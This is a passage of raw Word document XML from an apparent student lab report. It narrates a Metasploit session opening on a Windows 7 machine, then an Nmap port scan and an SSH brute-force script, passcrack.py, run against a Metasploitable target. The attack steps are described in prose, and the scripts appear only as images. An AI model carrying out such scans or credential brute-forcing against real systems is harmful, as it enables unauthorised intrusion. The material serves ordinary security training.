                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A98F717" w14:textId="5C66F362" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610E9922" w14:textId="24892CF8" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5176E11E" w14:textId="7CAFF8C6" w:rsidR="005E50AA" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:r w:rsidR="70C2130A" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>we can</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the IP for the target machine, set </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to go around into the files and use the command </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>to execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9AA68A" w14:textId="2077EC10" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A720FA" w14:textId="77777777" w:rsidR="005E50AA" w:rsidRDefault="005E50AA" w:rsidP="00AC7223">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A1F5443" wp14:editId="69909B77">
            <wp:extent cx="5943600" cy="16256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1625600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32182B14" w14:textId="3B30A25F" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA8F1EF" w14:textId="77777777" w:rsidR="005E50AA" w:rsidRDefault="005E50AA" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>And as we see. There is a session created and I am in the Windows 7 machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7901F4C2" w14:textId="0406CA1B" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525632DE" w14:textId="77777777" w:rsidR="005E50AA" w:rsidRDefault="005E50AA" w:rsidP="00AC7223">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00467980">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="231F54D5" wp14:editId="04062B07">
            <wp:extent cx="3626036" cy="1085906"/>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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3626036" cy="1085906"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439CBF3" w14:textId="77777777" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="5433AB64">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598B0BA0" w14:textId="67428325" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF268CD" w14:textId="09CBDB5B" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D9C0E5" w14:textId="58F931FC" w:rsidR="279DAA41" w:rsidRDefault="279DAA41" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attack Metasploitable from Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="4FE3131D" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="6727BDF7" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Scan and </w:t>
      </w:r>
      <w:r w:rsidR="4FE3131D" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Brute Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543D29EC" w14:textId="692D8D46" w:rsidR="279DAA41" w:rsidRDefault="279DAA41" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2900160F" w14:textId="3A161EC3" w:rsidR="279DAA41" w:rsidRDefault="279DAA41" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0EEF0AFF" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC472F" w14:textId="0AB9CF42" w:rsidR="1B503978" w:rsidRDefault="1B503978" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Tester</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Joseph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F923C8" w14:textId="0D763B36" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="163C3F06" w14:textId="3338BD17" w:rsidR="6566E15B" w:rsidRDefault="6566E15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">This script </w:t>
      </w:r>
      <w:r w:rsidR="298493FA" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">below </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">scans </w:t>
      </w:r>
      <w:r w:rsidR="5E87F3BA" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>etasploitable using Nmap</w:t>
      </w:r>
      <w:r w:rsidR="12FFAB4C" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, this attack will allow us to identify open ports that the target could leave our target vulnerable and </w:t>
      </w:r>
      <w:r w:rsidR="49F975D4" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>susceptible</w:t>
      </w:r>
      <w:r w:rsidR="4F827AE4" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Once the scan is complete the results will be stored in a text file titled nmapscan.txt.</w:t>
      </w:r>
      <w:r w:rsidR="12FFAB4C" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="626E2BEF" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Once the script i</w:t>
      </w:r>
      <w:r w:rsidR="3BC8D0CE" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="626E2BEF" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="299D71E6" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>initiated,</w:t>
      </w:r>
      <w:r w:rsidR="626E2BEF" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the user will be prompted </w:t>
      </w:r>
      <w:r w:rsidR="2EADA4C6" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>to insert</w:t>
      </w:r>
      <w:r w:rsidR="626E2BEF" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the target </w:t>
      </w:r>
      <w:r w:rsidR="1B48F967" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ip</w:t>
      </w:r>
      <w:r w:rsidR="626E2BEF" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> address. For the lab demonstration</w:t>
      </w:r>
      <w:r w:rsidR="1A00AA47" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="626E2BEF" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> we targeted a </w:t>
      </w:r>
      <w:r w:rsidR="078674F4" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="626E2BEF" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>etasploit</w:t>
      </w:r>
      <w:r w:rsidR="3A84FAF3" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">able host. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4633E715" w14:textId="0771B7D0" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659074F5" w14:textId="439C3908" w:rsidR="4E8C7FAD" w:rsidRDefault="4E8C7FAD" w:rsidP="775BB15B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08983EE4" wp14:editId="1B4B2F69">
            <wp:extent cx="4572000" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1383962137" name="Picture 138396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67CD312C" w14:textId="28BAD0EE" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7456388E" w14:textId="76D38B54" w:rsidR="67C17D7A" w:rsidRDefault="67C17D7A" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">From our Nmap scan, we can see that port 22 running the SSH is open on the target host. We will leverage that open port to perform a brute-force attack toward the Metasploitable target.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A3C6CC" w14:textId="0A5DAA78" w:rsidR="67C17D7A" w:rsidRDefault="67C17D7A" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F665DA5" w14:textId="6A88BF13" w:rsidR="67C17D7A" w:rsidRDefault="67C17D7A" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>In the image below we can see the script passcrack.py being executed. This script generates two separate lists for usernames and passwords. It then leverages Nmap and the SSH port that we found in our scan from earlier and performs a brute-force attack on the host until it finds the correct credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD6787" w14:textId="6587B403" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF2CC31" w14:textId="57A1C03E" w:rsidR="60B9F735" w:rsidRDefault="60B9F735" w:rsidP="775BB15B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DA8FBC7" wp14:editId="22BB28FF">
            <wp:extent cx="4572000" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="551406340" name="Picture 55140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20E0856D" w14:textId="41E98D7B" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B"/>
    <w:p w14:paraId="7316F4DF" w14:textId="6DDC532D" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B"/>
    <w:p w14:paraId="3477421C" w14:textId="57E16859" w:rsidR="6566E15B" w:rsidRDefault="6566E15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>In this image</w:t>
      </w:r>
      <w:r w:rsidR="068F99A0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> above</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, the passcrack script is finished and </w:t>
      </w:r>
      <w:r w:rsidR="0A8B80FC" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">we can see that </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">it found the correct credentials for the metasploitable </w:t>
      </w:r>
      <w:r w:rsidR="4DAC2201" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>target!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0905B32A" w14:textId="44DB9EBC" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E116B6" w14:textId="0B00428A" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31623729" w14:textId="3B945452" w:rsidR="4DAC2201" w:rsidRDefault="4DAC2201" w:rsidP="775BB15B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B551DE3" wp14:editId="451769FF">
            <wp:extent cx="4572000" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1897351289" name="Picture 189735128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1AD84199" w14:textId="6F3A002C" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A49223A" w14:textId="134728E6" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
